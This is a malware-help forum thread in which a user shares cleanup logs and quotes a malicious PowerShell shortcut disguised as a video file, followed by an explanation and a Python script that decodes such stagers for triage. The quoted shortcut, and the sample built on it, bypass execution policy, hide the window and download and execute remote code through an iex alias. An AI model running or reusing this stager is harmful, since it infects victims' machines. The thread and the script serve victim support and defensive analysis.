markb94
  1. Hi Ron,

     Thanks for helping me out. After targeting the file with Windows Defender, it did detect it as a virus and removed it, but just to be sure my computer isn't still infected, here are the results from following the steps:

     # -------------------------------
     # Malwarebytes AdwCleaner 7.3.0.0
     # -------------------------------
     # Build:    04-04-2019
     # Database: 2019-04-08.1 (Cloud)
     # Support:  https://www.malwarebytes.com/support
     #
     # -------------------------------
     # Mode: Clean
     # -------------------------------
     # Start:    04-10-2019
     # Duration: 00:00:01
     # OS:       Windows 10 Pro
     # Cleaned:  9
     # Failed:   1

     ***** [ Services ] *****
     No malicious services cleaned.

     ***** [ Folders ] *****
     No malicious folders cleaned.

     ***** [ Files ] *****
     No malicious files cleaned.

     ***** [ DLL ] *****
     No malicious DLLs cleaned.

     ***** [ WMI ] *****
     No malicious WMI cleaned.

     ***** [ Shortcuts ] *****
     No malicious shortcuts cleaned.

     ***** [ Tasks ] *****
     No malicious tasks cleaned.

     ***** [ Registry ] *****
     Deleted HKCU\Software\csastats

     ***** [ Chromium (and derivatives) ] *****
     Deleted Amazon Assistant for Chrome

     ***** [ Chromium URLs ] *****
     Deleted AVG Secure Search
     Deleted Search Here
     Deleted Search The Web (privitize)
     Deleted Search The Web (privitize)
     Deleted Web Search
     Deleted WebSearch
     Deleted banggood.com
     Not Deleted Search Here

     ***** [ Firefox (and derivatives) ] *****
     No malicious Firefox entries cleaned.

     ***** [ Firefox URLs ] *****
     No malicious Firefox URLs cleaned.

     *************************
     [+] Delete Tracing Keys
     [+] Reset Winsock
     *************************

     AdwCleaner[S00].txt - [1650 octets] - [10/04/2019 09:13:25]

     ########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

     FRST.txt Addition.txt log.txt
  2. I used virus total to analyze the file, here are the results: https://www.virustotal.com/#/file-analysis/YzM2ODBiN2M5ODQ2M2VhNmNiNjM5M2RkZDJlMzgyZTU6MTU1NDg3Nzc0Ng==
  3. I downloaded what I thought was a video file and after I tried to open it twice, I realized it was actually a PowerShell shortcut with the following parameters:

     -Exec bypass -windo 1 $Lti=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal ext $Lti;$wbB=((New-Object Net.WebClient)).DownloadString('http://shortbit.xyz/haku');ext $wbB

     I immediately ran virus scans on Windows Defender, Malwarebytes and Kaspersky VRT but they didn't catch anything. I checked Event Viewer and it has logged multiple events in PowerShell and Security within a few seconds of the shortcut being run, so I know it did something or at least tried to do something, and I just want to be sure that my computer is safe. I ran the shortcut at 2019-04-10 04:02 and from the FRST.txt I can see that it downloaded a file called rew.exe that is associated with Realtek Semiconductor and has the Adobe logo as its icon, so it's definitely not legit. It seems the anti-virus programs didn't catch it and it's still on my system; what should I do with it? It also created several user permission groups and I have no idea how to get rid of them.

     FRST.txt Addition.txt
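The shortcut arguments quoted in that post are a typical PowerShell stager: the execution policy is bypassed, the window is hidden, `'aWV4'` is just Base64 for `iex`, `sal` (PowerShell's built-in alias for Set-Alias) turns `ext` into another name for Invoke-Expression, and whatever `DownloadString` fetches is executed straight from memory, which is why scanning the .lnk itself finds nothing. The following triage helper is an added example for this profile page, not code from the thread or from Malwarebytes. It is Python rather than PowerShell so it can be run from an analysis box, the sample argument string is constructed to mirror the structure of the one in the post, and the download URL is a placeholder (`example.invalid`), not the real one.

```python
import base64
import re

# Constructed sample modelled on the shortcut arguments quoted in the post above.
# The download URL is a placeholder (example.invalid), not the one from the thread.
SAMPLE_ARGS = (
    "-Exec bypass -windo 1 "
    "$Lti=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));"
    "sal ext $Lti;"
    "$wbB=((New-Object Net.WebClient)).DownloadString('http://example.invalid/stage');"
    "ext $wbB"
)

# Base64 literal passed to [Convert]::FromBase64String(...)
B64_LITERAL = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
# $var = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('...'))
B64_ASSIGN = re.compile(
    r"(\$\w+)\s*=\s*\[Text\.Encoding\]::UTF8\.GetString\("
    r"\[Convert\]::FromBase64String\('([A-Za-z0-9+/=]+)'\)\)"
)
# sal <alias> $var   (sal is PowerShell's built-in alias for Set-Alias)
ALIAS = re.compile(r"\b(?:sal|Set-Alias)\s+(\S+)\s+(\$\w+)", re.IGNORECASE)
# URL handed to WebClient.DownloadString(...)
DOWNLOAD_URL = re.compile(r"DownloadString\(\s*'(https?://[^']+)'\s*\)")


def decode_b64_literals(args):
    """Decode every FromBase64String literal; None marks input that does not decode."""
    decoded = []
    for m in B64_LITERAL.finditer(args):
        try:
            decoded.append(base64.b64decode(m.group(1)).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            decoded.append(None)
    return decoded


def resolve_aliases(args):
    """Map each alias created with sal/Set-Alias to the decoded command it points at."""
    var_values = {
        var: base64.b64decode(b64).decode("utf-8", "replace")
        for var, b64 in B64_ASSIGN.findall(args)
    }
    return {alias: var_values.get(var) for alias, var in ALIAS.findall(args)}


def triage(args):
    """Return the indicators a defender would pull out of a PowerShell argument string."""
    lowered = args.lower()
    aliases = resolve_aliases(args)
    alias_is_iex = any(
        v is not None and v.lower() in ("iex", "invoke-expression") for v in aliases.values()
    )
    literal_iex = re.search(r"\b(iex|invoke-expression)\b", lowered) is not None
    return {
        # -Exec bypass: execution policy is switched off for this process
        "execution_policy_bypass": re.search(r"-exec\w*\s+bypass", lowered) is not None,
        # -windo 1: -WindowStyle Hidden (1), so the user never sees a console
        "hidden_window": re.search(r"-windo\w*\s+(1|hidden)\b", lowered) is not None,
        "decoded_literals": decode_b64_literals(args),
        "aliases": aliases,
        "download_urls": DOWNLOAD_URL.findall(args),
        # downloaded text is fed to Invoke-Expression, directly or through an alias
        "remote_code_execution": alias_is_iex or literal_iex,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_ARGS).items():
        print(f"{key}: {value}")
```

Running it prints the decoded `iex`, the `ext -> iex` alias, the download URL and the three flags, which is the information worth keeping from a shortcut like this: the URL for blocking and for checking proxy logs, and the fact that the payload never touched disk as a script, so the artefacts to look for are the later downloads (the rew.exe noted in the post) and the PowerShell operational log entries the poster already saw in Event Viewer.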